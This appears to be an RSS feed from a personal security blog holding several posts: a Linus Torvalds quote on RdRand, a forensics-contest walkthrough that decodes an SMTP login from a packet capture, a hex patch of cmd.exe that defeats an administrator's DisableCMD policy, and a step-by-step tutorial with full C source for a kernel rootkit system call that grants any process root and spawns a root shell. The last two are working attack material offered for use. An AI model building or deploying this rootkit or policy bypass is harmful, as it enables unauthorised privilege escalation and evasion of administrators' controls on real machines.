GL.IB.LY » security http://gl.ib.ly Thoughts on security, computing, business and stuff! Sun, 18 May 2014 11:51:56 +0000 en-US hourly 1 http://wordpress.org/?v=3.9.1 Linus Torvalds responds to petition to remove RdRand from /dev/random http://gl.ib.ly/stuff/2013/09/17/linus-torvalds-responds-to-petition-to-remove-rdrand-from-dev-random/?utm_source=rss&utm_medium=rss&utm_campaign=linus-torvalds-responds-to-petition-to-remove-rdrand-from-dev-random http://gl.ib.ly/stuff/2013/09/17/linus-torvalds-responds-to-petition-to-remove-rdrand-from-dev-random/#comments Tue, 17 Sep 2013 12:04:56 +0000 http://gl.ib.ly/?p=14 Really funny petition at http://www.change.org/en-GB/petitions/linus-torvalds-remove-rdrand-from-dev-random-4 Linus’ reply: Where do I start a petition to raise the IQ and kernel knowledge of people? Guys, go read drivers/char/random.c. Then, learn about cryptography. Finally, come back here and admit to the world that
Read more ›

The post Linus Torvalds responds to petition to remove RdRand from /dev/random appeared first on GL.IB.LY.

]]> Really funny petition at http://www.change.org/en-GB/petitions/linus-torvalds-remove-rdrand-from-dev-random-4

Linus’ reply:

Where do I start a petition to raise the IQ and kernel knowledge of people? Guys, go read drivers/char/random.c. Then, learn about cryptography. Finally, come back here and admit to the world that you were wrong. Short answer: we actually know what we are doing. You don’t. Long answer: we use rdrand as one of many inputs into the random pool, and we use it as a way to improve that random pool. So even if rdrand were to be back-doored by the NSA, our use of rdrand actually improves the quality of the random numbers you get from /dev/random. Really short answer: you’re ignorant.

 

The post Linus Torvalds responds to petition to remove RdRand from /dev/random appeared first on GL.IB.LY.

]]> http://gl.ib.ly/stuff/2013/09/17/linus-torvalds-responds-to-petition-to-remove-rdrand-from-dev-random/feed/ 0 Ann skips bail. Cue forensics puzzle. http://gl.ib.ly/computing/2009/11/27/ann-skips-bail-cue-forensics-puzzle/?utm_source=rss&utm_medium=rss&utm_campaign=ann-skips-bail-cue-forensics-puzzle http://gl.ib.ly/computing/2009/11/27/ann-skips-bail-cue-forensics-puzzle/#comments Fri, 27 Nov 2009 09:00:01 +0000 http://gl.ib.ly/?p=69 Found a website and a forensics contest yesterday quite by accident. I was waiting for somebody before going out for the night and I thought this might be a little fun while I waited. Now the contest had closed and
Read more ›

The post Ann skips bail. Cue forensics puzzle. appeared first on GL.IB.LY.

]]> Found a website and a forensics contest yesterday quite by accident. I was waiting for somebody before going out for the night and I thought this might be a little fun while I waited. Now the contest had closed and the results where available, which I ignored until the end and went straight to Puzzle #2: Ann skips bail.

The puzzle revolves around a packet capture of Ann’s network taken by wily investigators before she skipped bail. Police are confident that she communicated with a secret lover prior to her disappearance. And so follows a number of competition questions. It is important to note that the organizers are looking for the most elegant solutions, and you won’t see that here. What you will see is how to solve the puzzle very quickly.

1. What is Ann’s email address?
2. What is Ann’s email password?
3. What is Ann’s secret lover’s email address?
4. What two items did Ann tell her secret lover to bring?
5. What is the NAME of the attachment Ann sent to her secret lover?
6. What is the MD5sum of the attachment Ann sent to her secret lover?
7. In what CITY and COUNTRY is their rendez-vous point?
8. What is the MD5sum of the image embedded in the document?


I downloaded the packet dump file from the organiser’s site and verified the hash using md5 as I am on a Mac, otherwise md5sum does the job.

I fired up wireshark and opened the packet capture file. There appeared to be a good bit of SMTP traffic. So I did a quick

grep -an "To:.*\|From:*\|Subject:.*" evidence02.pcap


on the packet dump which revealed the following.


From: "Ann Dercover" <sneakyg33k@aol.com>
To: <sec558@gmail.com>
Subject: lunch next week
From: "Ann Dercover" <sneakyg33k@aol.com>
To: <mistersecretx@aol.com>
Subject: rendezvous

Its clear that Ann Dercover’s email address is sneakyg33k@aol.com. This is the answer to question 1. We also see she sent two emails. One to mistersecretx@aol.com, could this be Ann’s secret lover? I expanded the grep to 

grep -aA50 "mistersecretx@aol.com" evidence02.pcap


This gives me 50 lines after and including lines matching mistersecretx@aol.com

To: <mistersecretx@aol.com>
Subject: rendezvous
Date: Sat, 10 Oct 2009 07:38:10 -0600
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_000D_01CA497C.9DEC1E70"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

——=_NextPart_000_000D_01CA497C.9DEC1E70
Content-Type: multipart/alternative;
boundary=”—-=_NextPart_001_000E_01CA497C.9DEC1E70″

——=_NextPart_001_000E_01CA497C.9DEC1E70
Content-Type: text/plain;
charset=”iso-8859-1″
Content-Transfer-Encoding: quoted-printable

Hi sweetheart! Bring your fake passport and a bathing suit. Address =
attached. love, Ann
——=_NextPart_001_000E_01CA497C.9DEC1E70
Content-Type: text/html;
charset=”iso-8859-1″
Content-Transfer-Encoding: quoted-printable

…SNIP…

Hi sweetheart! Bring your fake passport =
and a=20
bathing suit. Address attached. love, Ann

…SNIP…

——=_NextPart_000_000D_01CA497C.9DEC1E70
Content-Type: application/octet-stream;
name=”secretrendezvous.docx”
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=”secretrendezvous.docx”


Wow. So mistersecretx@aol.com IS the email address of Ann’s lover. This is the answer to question 3. We also see in her message she instructs them to “bring your fake passport and bathing suit”, this is the answer to question 4. Towards the bottom we see an attachment that probably appears later than the lines we grep’d called secretrendezvous.docx which will appear base64 encoding. This is the answer to question 5.

I then returned to wireshark, looking down through the packets I quickly see SMTP traffic with C: DATA fragment which tells us this traffic was broken up into smaller pieces. This is likely to be an email with a large attachment. I right clicked on one of these packets as shown below and clicked on Follow TCP Stream as shown below.



This gives me the following.

220 cia-mc07.mx.aol.com ESMTP mail_cia-mc07.1; Sat, 10 Oct 2009 15:37:56 -0400
EHLO annlaptop
250-cia-mc07.mx.aol.com host-69-140-19-190.static.comcast.net
250-AUTH=LOGIN PLAIN XAOL-UAS-MB
250-AUTH LOGIN PLAIN XAOL-UAS-MB
250-STARTTLS
250-CHUNKING
250-BINARYMIME
250-X-AOL-FWD-BY-REF
250-X-AOL-DIV_TAG
250-X-AOL-OUTBOX-COPY
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
c25lYWt5ZzMza0Bhb2wuY29t
334 UGFzc3dvcmQ6
NTU4cjAwbHo=
235 AUTHENTICATION SUCCESSFUL
MAIL FROM: <sneakyg33k@aol.com>
250 OK
RCPT TO: <mistersecretx@aol.com>
250 OK
DATA
354 START MAIL INPUT, END WITH "." ON A LINE BY ITSELF
Message-ID: <001101ca49ae$e93e45b0$9f01a8c0@annlaptop>
From: "Ann Dercover" <sneakyg33k@aol.com>
To: <mistersecretx@aol.com>
Subject: rendezvous
Date: Sat, 10 Oct 2009 07:38:10 -0600
MIME-Version: 1.0
Content-Type: multipart/mixed;
.boundary="----=_NextPart_000_000D_01CA497C.9DEC1E70"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

——=_NextPart_000_000D_01CA497C.9DEC1E70
Content-Type: multipart/alternative;
.boundary=”—-=_NextPart_001_000E_01CA497C.9DEC1E70″

——=_NextPart_001_000E_01CA497C.9DEC1E70
Content-Type: text/plain;
.charset=”iso-8859-1″
Content-Transfer-Encoding: quoted-printable

Hi sweetheart! Bring your fake passport and a bathing suit. Address =
attached. love, Ann
——=_NextPart_001_000E_01CA497C.9DEC1E70
Content-Type: text/html;
.charset=”iso-8859-1″
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D”text/html; =
charset=3Diso-8859-1″>
<META content=3D”MSHTML 6.00.2900.2853″ name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Hi sweetheart! Bring your fake passport =
and a=20
bathing suit. Address attached. love, Ann</FONT></DIV></BODY></HTML>

——=_NextPart_001_000E_01CA497C.9DEC1E70–

——=_NextPart_000_000D_01CA497C.9DEC1E70
Content-Type: application/octet-stream;
.name=”secretrendezvous.docx”
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
.filename=”secretrendezvous.docx”

UEsDBBQABgAIAAAAIQDleUAGfwEAANcFAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAAC
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0
VMluwjAQvVfqP0S+VsTQQ1VVBA5dji1S6QcYexKsepNttr/vOEBEKQSpwCVSPH7LPI/dHy61yubg
g7SmIL28SzIw3AppqoJ8jd86jyQLkRnBlDVQkBUEMhzc3vTHKwchQ7QJBZnG6J4oDXwKmoXcOjBY
Ka3XLOKvr6hj/JtVQO+73QfKrYlgYicmDjLov0DJZipmr0tcXjtxpiLZ83pfkiqI1Amf1ulBhAcV
9iDMOSU5i9gbnRux56uz8ZQjst4TptKFOzR+RCFVfnvaFdjgPjBMLwVkI+bjO9PonC6sF1RYPtPY
dd5Oc8CnLUvJocEnNucthxDwlLTKm4pm0mz9H/VhZnoCHpGXN9JQnzQR4kpBuLyDNW+bPIY18tYF
imd3tj6kgRUgOngeDnyU0MzP0fwDxIjpX6P5DXNb+/UoRrymQOtv7+wMapqTkiVe5TGbKDhb78/4
N9QnTSxg8nm19HfI24w088et/0cY2zcroQ9MHa2f5cEPAAAA//8DAFBLAwQUAAYACAAAACEAHpEa
t/MAAABOAgAACwAIAl9yZWxzLy5yZWxzIKIEAiigAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIyS20oDQQyG7wXfYch9N9sKItLZ3kihdyLr
A4SZ7AF3Dsyk2r69oyC6UNte5vTny0/Wm4Ob1DunPAavYVnVoNibYEffa3htt4sHUFnIW5qCZw1H
zrBpbm/WLzyRlKE8jDGrouKzhkEkPiJmM7CjXIXIvlS6kBxJCVOPkcwb9Yyrur7H9FcDmpmm2lkN
aWfvQLXHWDZf1g5dNxp+Cmbv2MuJFcgHYW/ZLmIqbEnGco1qKfUsGmwwzyWdkWKsCjbgaaLV9UT/
X4uOhSwJoQmJz/N8dZwDWl4PdNmiecevOx8hWSwWfXv7Q4OzL2g+AQAA//8DAFBLAwQUAAYACAAA
ACEApOAquCABAAA6BAAAHAAIAXdvcmQvX3JlbHMvZG9jdW1lbnQueG1sLnJlbHMgogQBKKAAAQAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACsk01OwzAQhfdI3MHynjgpUBCq0w1C6hbCAdxkkljE
P7KnQG7PKFKbVJSwycbSvCjvfZ7xbLbfpmOfEKJ2VvIsSTkDW7pK20by9+Ll5pGziMpWqnMWJO8h
8m1+fbV5hU4h/RRb7SMjFxslbxH9kxCxbMGomDgPlr7ULhiFVIZGeFV+qAbEKk3XIkw9eH7myXaV
5GFX3XJW9J6S//d2da1LeHblwYDFCxEiAiLdLJKnCg2g5EclIU4uLiM8LImA1BoY84dSDGc2x7Ba
kiFi39EcxyYM9Vx8tmS8PZg9BJrDSHCS5iDWS0LUzmKh9t1kFidpDuJ+SQhtaBfGLhiotBKDmCWe

…SNIP: not publishing the whole thing, its a bit long. See the whole thing?

JZ2ekPwNAAD//wMAUEsBAi0AFAAGAAgAAAAhAOV5QAZ/AQAA1wUAABMAAAAAAAAAAAAAAAAAAAAA
AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAHpEat/MAAABOAgAACwAAAAAAAAAA
AAAAAAC4AwAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEApOAquCABAAA6BAAAHAAAAAAAAAAA
AAAAAADcBgAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc1BLAQItABQABgAIAAAAIQA6Q0kI
FQQAAFgKAAARAAAAAAAAAAAAAAAAAD4JAAB3b3JkL2RvY3VtZW50LnhtbFBLAQItAAoAAAAAAAAA
IQBg7VaATPYCAEz2AgAVAAAAAAAAAAAAAAAAAIINAAB3b3JkL21lZGlhL2ltYWdlMS5wbmdQSwEC
LQAUAAYACAAAACEAlrWt4pYGAABQGwAAFQAAAAAAAAAAAAAAAAABBAMAd29yZC90aGVtZS90aGVt
ZTEueG1sUEsBAi0AFAAGAAgAAAAhAIkUT0qVAwAAcQgAABEAAAAAAAAAAAAAAAAAygoDAHdvcmQv
c2V0dGluZ3MueG1sUEsBAi0AFAAGAAgAAAAhAErYipK7AAAABAEAABQAAAAAAAAAAAAAAAAAjg4D
AHdvcmQvd2ViU2V0dGluZ3MueG1sUEsBAi0AFAAGAAgAAAAhADVKHsm+CgAALFoAAA8AAAAAAAAA
AAAAAAAAew8DAHdvcmQvc3R5bGVzLnhtbFBLAQItABQABgAIAAAAIQCQUuGobwEAANcCAAARAAAA
AAAAAAAAAAAAAGYaAwBkb2NQcm9wcy9jb3JlLnhtbFBLAQItABQABgAIAAAAIQAXVdHWCQQAAMsZ
AAASAAAAAAAAAAAAAAAAAAwdAwB3b3JkL251bWJlcmluZy54bWxQSwECLQAUAAYACAAAACEAu6G5
NXECAACGCAAAEgAAAAAAAAAAAAAAAABFIQMAd29yZC9mb250VGFibGUueG1sUEsBAi0AFAAGAAgA
AAAhAKVR8wbYAQAA2QMAABAAAAAAAAAAAAAAAAAA5iMDAGRvY1Byb3BzL2FwcC54bWxQSwUGAAAA
AA0ADQBEAwAA9CYDAAAA

——=_NextPart_000_000D_01CA497C.9DEC1E70–

.
250 OK
QUIT
221 SERVICE CLOSING CHANNEL

You may or may not realise that parts of the communication are base64 encoded. Lets take a look at some information encoded at the beginning of this communication again. 

AUTH LOGIN
334 VXNlcm5hbWU6
c25lYWt5ZzMza0Bhb2wuY29t
334 UGFzc3dvcmQ6
NTU4cjAwbHo=
235 AUTHENTICATION SUCCESSFUL

Here Ann is authenticating with the service. Her responses are shown in red, and as you can see they’re a bit cryptic; however, they look like they are encoded in base64. So we run the following two commands.

$ echo "c25lYWt5ZzMza0Bhb2wuY29t" | openssl base64 -d
sneakyg33k@aol.com
$ echo "NTU4cjAwbHo=" | openssl base64 -d
558r00lz

Note: $ is the command prompt, what follows it is the command with output in green.

So we find Ann’s email password is 558r00lz. This the answer to question 2. 

Next we have a look at the attachment which is base64 encoded. We copy all the blue text above and paste into a file called attachment.b64 and issue the following commands.

$ openssl base64 -d < attachment.b64 > secretrendezvous.docx
$ md5 secretrendezvous.docx
MD5 (secretrendezvous.docx) = 9e423e11db88f01bbff81172839e1923


This decodes the data and outputs to secretrendezvous.docx. We can open the file, verifying it is good and thus the md5 sum of 9e423e11db88f01bbff81172839e1923 is the answer to question 6. When we open the file we see an image like the one below.



This tells us that Ann was off to Playa del Carmen in Mexico. This is the answer to question 7. We only now need to get the md5 sum of the image in the document. This is easy enough as we can just do the following:


$ unzip secretrendezvous.docx -d attachment
Archive: out-1.docx
inflating: attachment/[Content_Types].xml
inflating: attachment/_rels/.rels
inflating: attachment/word/_rels/document.xml.rels
inflating: attachment/word/document.xml
extracting: attachment/word/media/image1.png
inflating: attachment/word/theme/theme1.xml
inflating: attachment/word/settings.xml
inflating: attachment/word/webSettings.xml
inflating: attachment/word/styles.xml
inflating: attachment/docProps/core.xml
inflating: attachment/word/numbering.xml
inflating: attachment/word/fontTable.xml
inflating: attachment/docProps/app.xml 


The only image file in there is attachment/word/media/image1.png. Open it up to verify it is the business and then just do 

$ md5 attachment/word/media/image1.png
MD5 (attachment/word/media/image1.png) = aadeace50997b1ba24b09ac2ef1940b7

This is the answer to question 8, and we’re finished. That was quick! The answers have been published so you can verify. Now that person has turned up and is dragging me away from my computer so that’s all for now.

 

The post Ann skips bail. Cue forensics puzzle. appeared first on GL.IB.LY.

]]> http://gl.ib.ly/computing/2009/11/27/ann-skips-bail-cue-forensics-puzzle/feed/ 0 Rubber hose attacks! http://gl.ib.ly/stuff/2009/02/07/cryptography-rubber-hose-attacks/?utm_source=rss&utm_medium=rss&utm_campaign=cryptography-rubber-hose-attacks http://gl.ib.ly/stuff/2009/02/07/cryptography-rubber-hose-attacks/#comments Sat, 07 Feb 2009 06:07:10 +0000 http://gl.ib.ly/?p=29 Awesome! Hot linked from xkcd. Also, checkout wikipedia for more details on what the Russians do and how public key cryptography could get you killed or landed in jail (if you live in the uk).

The post Rubber hose attacks! appeared first on GL.IB.LY.

]]>

Awesome! Hot linked from xkcd. Also, checkout wikipedia for more details on what the Russians do and how public key cryptography could get you killed or landed in jail (if you live in the uk).

The post Rubber hose attacks! appeared first on GL.IB.LY.

]]> http://gl.ib.ly/stuff/2009/02/07/cryptography-rubber-hose-attacks/feed/ 0 The command prompt has been disabled by your administrator? http://gl.ib.ly/stuff/2009/02/05/command-prompt-disabled-administrator/?utm_source=rss&utm_medium=rss&utm_campaign=command-prompt-disabled-administrator http://gl.ib.ly/stuff/2009/02/05/command-prompt-disabled-administrator/#comments Thu, 05 Feb 2009 06:32:03 +0000 http://gl.ib.ly/?p=39 I came across an old enough post on Didier’s blog about Group policies that have disabled cmd.exe from running. Didier mentions a few ways to get cmd.exe to run. The suggestion I like the most is to find the DisableCMD string in cmd.exe
Read more ›

The post The command prompt has been disabled by your administrator? appeared first on GL.IB.LY.

]]> I came across an old enough post on Didier’s blog about Group policies that have disabled cmd.exe from running. Didier mentions a few ways to get cmd.exe to run. The suggestion I like the most is to find the DisableCMD string in cmd.exe and change it to DisableAMD using a hex editor. Thankfully there is a tool which will allow us to patch cmd.exe in one tiny line.

The tool is Swiss File Knife and it is fantabulous. Luckily it is available on Windows as well as Linux. Oh yeah, the command!Well first make a copy of your cmd.exe (%SYSTEMROOT%\System32\cmd.exe) file, mine is called cmd2.exe.

sfk replace cmd2.exe -binary /440069007300610062006c00650043004D004400/440069007300610062006c00650041004D004400/

A quick explanation of what is being changed

  D   i   s   a   b   l   e   C   M  D           ... to...
 440069007300610062006c00650043004D004400
  D   i   s   a   b   l   e   A   M  D    
 440069007300610062006c00650043004D004400

You can check your changes are all right if you see the following.

xxd cmd2.exe | egrep  -A1 “D.i.s.a”
00040d0: 4400 6900 7300 6100 6200 6c00 6500 5500  D.i.s.a.b.l.e.U.
00040e0: 4e00 4300 4300 6800 6500 6300 6b00 0000  N.C.C.h.e.c.k...
--
0013d40: 7e05 ffff 4400 6900 7300 6100 6200 6c00  ~...D.i.s.a.b.l.
0013d50: 6500 4100 4d00 4400 0000 6689 18e9 def4  e.A.M.D...f.....
--
004a400: 2000 2000 2000 4400 6900 7300 6100 6200   . . .D.i.s.a.b.
004a410: 6c00 6500 2000 6500 7800 6500 6300 7500  l.e. .e.x.e.c.u.
--
004aad0: 2000 4400 6900 7300 6100 6200 6c00 6500   .D.i.s.a.b.l.e.
004aae0: 2000 6400 6500 6c00 6100 7900 6500 6400   .d.e.l.a.y.e.d.

The post The command prompt has been disabled by your administrator? appeared first on GL.IB.LY.

]]> http://gl.ib.ly/stuff/2009/02/05/command-prompt-disabled-administrator/feed/ 0 Adding a malicious system call to the Linux kernel – Rootkit http://gl.ib.ly/security/2008/12/11/adding-a-malicious-system-call-to-the-linux-kernel-rootkit/?utm_source=rss&utm_medium=rss&utm_campaign=adding-a-malicious-system-call-to-the-linux-kernel-rootkit http://gl.ib.ly/security/2008/12/11/adding-a-malicious-system-call-to-the-linux-kernel-rootkit/#comments Thu, 11 Dec 2008 18:02:50 +0000 http://gl.ib.ly/?p=77 Introduction Today I am adding a malicious system call to the Linux kernel which will allow the caller to do something they cannot normally do in user mode. When attacking a Linux box our goal is usually to become root;
Read more ›

The post Adding a malicious system call to the Linux kernel – Rootkit appeared first on GL.IB.LY.

]]> Introduction

Today I am adding a malicious system call to the Linux kernel which will allow the caller to do something they cannot normally do in user mode. When attacking a Linux box our goal is usually to become root; as root we can do anything we like, so the system call I will add to the Linux kernel gives the caller real and effective user ids of zero.

There are relatively few tutorials out there on how to do this, unfortunately there a little differences between versions of Linux that can easily stump beginners, so this tutorial tries to give you an environment which you can easily replicate using a virtual machine and go through the tutorial.

The System

In this tutorial I use Microsoft® Virtual PC 6.0.156.0 which is free and easily available to windows users. I’d highly recommend VirtualBox which I use more often. My virtual machine had Virtual Hard Disk of 4GB and 512mb of RAM. The OS used was OpenSuse 10.2 (x86).
00000041
Look for the following on the web:

  • openSUSE-10.2-GM-i386-CD1.iso
  • openSUSE-10.2-GM-i386-CD2.iso
  • openSUSE-10.2-GM-i386-CD3.iso
  • openSUSE-10.2-GM-i386-CD4.iso
  • openSUSE-10.2-GM-i386-CD5.iso

Once fully installed su to the root account (simply type su at the console) and enter your root password. Then type yast and hit enter.

Enter Software Management as there is a good few packages we need, namely: gcc, gdb, make, automake, autoconf, kernel-source. Add these packages by searching for them, checking them and then installing them.

I have also read a suggestion that ArchLinux is a good no nonsense distro which is good for getting your hands dirty. I haven’t used it yet but it sounds like it is worth looking into.

Adding the System Call

After installing kernel-source, the kernel sources should be available at /usr/src/. Inside this directory there should be symbolic link called linux to whichever sources where installed, in my case I had the following:
00000064
You might notice linux-2.6.18.2-34_orig from the ls above, this is just a copy of the original sources before I started editing them; also, the packages directory is created during the make process.

Get yourself into /usr/src/linux and let’s get editing >;-D. All paths given below are relative to this directory.

    1. Create the file kernel/rootkit.h and paste in the code from the rootkit.h part of the appendix.
    2. Create the file kernel/rootkit.c and paste in the code from the rootkit.c part of the appendix.
    3. Open arch/i386/kernel/syscall.S and add the following to the end:
      .long sys_rootkit

      As you may have guessed my new system call is going to be called rootkit — as it will give us root on the affected box; while this is all nice dandy for our purposes, rootkits should be a great deal stealthier .

    4. Open kernel/Makefile and add the following to the right hand side of “obj-i =”:
      rootkit.o
    5. Open include/asm/unistd.h. You should see many lines of the format #define __NR_<some_symbol> <some_number>, scroll to the last such line and add the following:
      #define __NR_rootkit 318
    6. The number on the right (above) should be one greater than the number on the preceding line, in my case this was 318. In addition we must also edit the system call counter to reflect there being one more system call. This should be located a couple of lines below your new line. It should now read:
      #define NR_systemcalls 319
    7. Copy the configuration file for the existing kernel (as we know it works) by entering cp /boot/config-`uname –r`./.config at the command prompt, to our source directory.
    8. Type make menuconfig, this will bring up a console configuration menu. Select Load an alternative file and confirm the usage of the .config file. I like to edit General Settings -> Local Version to read rootkit, just so I don’t forget what this kernel contains!
    9. Type make rpm and hit return to kick off compilation. This process can take a long time, typically 15-20 minutes.
    10. When compilation has finished do the following:
      00000083
      Brilliant! Our kernel rpm is good to go, for this system and others <insert_long_evil_laugh_here>! Let’s install the kernel by typing rpm -ivh kernel-2.6.18.234rootkit-1.i386.rpm (use the –force option for subsequent installations on the same system, for which you can omit all later steps).00000089
    11. Next we need to create a ramdisk for our new kernel, otherwise we may run into boot problems. Do this my typing mkinitrd at the prompt and hitting return.
    12. Start yast and follow the screen shots.
      00000097000001210000015300000180
      Select correct Kernel image and Initial RAM disk and hit OK.
      00000212
      Move our Rootkit version to the top and set as the default boot option. Then exit yast and type shutdown -r now!
    13. You should be greeted by the following on reboot.00000244
    14. When the system has fully loaded, open up a terminal and the following:00000606This confirms that our new kernel is in action!

Using the System call

      1. I like everything in userland to reflect the changes in the kernel. To do this open up /usr/include/asm/unistd.h (you will need to be root) and edit as we did in step 5 of Adding the System Call. Also, open up /usr/include/bits/syscall.h and add the following line wherever you want.
        #define SYS_rootkit __NR_rootkit
      2. Login as a non privileged user, create a myprog.c file in your home directory and paste in the contents of the myprog.c section in the appendix.
      3. Compile the program by typing in gcc myprog.c. This will create an executable file called a.out.
      4. Execute a.out by typing ./a.out at the prompt. If everything goes well you should see the following.00000610
        To see some further debugging output type dmesg | less at a prompt. You’ll get something like this at the end:
        00000617

Appendix

System Call

Most accurate source is available at http://gist.github.com/163266.

rootkit.h

#ifndef __LINUX_ROOTKIT_H 
#define __LINUX_ROOTKIT_H 
 
#include <linux/linkage.h> 
#include <linux/kernel.h> 
#include <linux/sched.h> 
#include <linux/syscalls.h> 
#include <linux/sys.h> 
 
#endif

rootkit.c

#include "rootkit.h" 
int pc = 0; 

int print_info(void) { 
   int o_ruid = current->uid; 
   int o_euid = current->euid; 
   int o_suid = current->suid; 
   pc++;// inc counter 
   printk("\n *** ---[ Printing %d ] *** \n", pc); 
   printk("uid = %d ", o_ruid); 
   printk("euid = %d ", o_euid); 
   printk("suid = %d ", o_suid); 
   printk("getuid() = %d ", (int) sys_getuid()); 
   printk("geteuid() = %d ", (int) sys_geteuid()); 
   printk("getpid() = %d ", (int) sys_getpid()); 
   return (0); 
} 
 
asmlinkage int sys_rootkit(int mode, pid_t mypid) { 
   struct task_struct *ts; 
   int rc=0; // Get some feedback 
 
   print_info(); 
 
   printk("find_task_by_pid(%d)!\n", mypid); 
   ts = find_task_by_pid(mypid); 
   if(ts) { 
      ts->uid = (uid_t)0; 
      ts->euid = (uid_t)0; 
   } else { 
      rc = -1; 
   } 
 
   print_info(); 
   return(rc);
}

Userland Program

myprog.c

#include <linux/unistd.h> 
#include <sys/syscall.h> 
#include <stdio.h> 
 
#define rootkit(x,y) syscall(__NR_rootkit,x,y) 
 
main() { 
   printf("Exit code = %d\n\n", rootkit(1,getpid())); 
 
   char *cmd[2]; 
   cmd[0] = "/bin/sh"; 
   cmd[1] = NULL; 
   execve(cmd[0], cmd, NULL); 
}

Please note the #define above. Many HOWTOs on the net state that you should use _syscall2(int, rootkit, …); to establish the rootkit macro; however, all of these _syscall<number_of_args> (…) have been moved to kernel only spaces (older kernels are not affected). From now on you should use syscall (type man syscall at a prompt for further info).

The post Adding a malicious system call to the Linux kernel – Rootkit appeared first on GL.IB.LY.

]]> http://gl.ib.ly/security/2008/12/11/adding-a-malicious-system-call-to-the-linux-kernel-rootkit/feed/ 0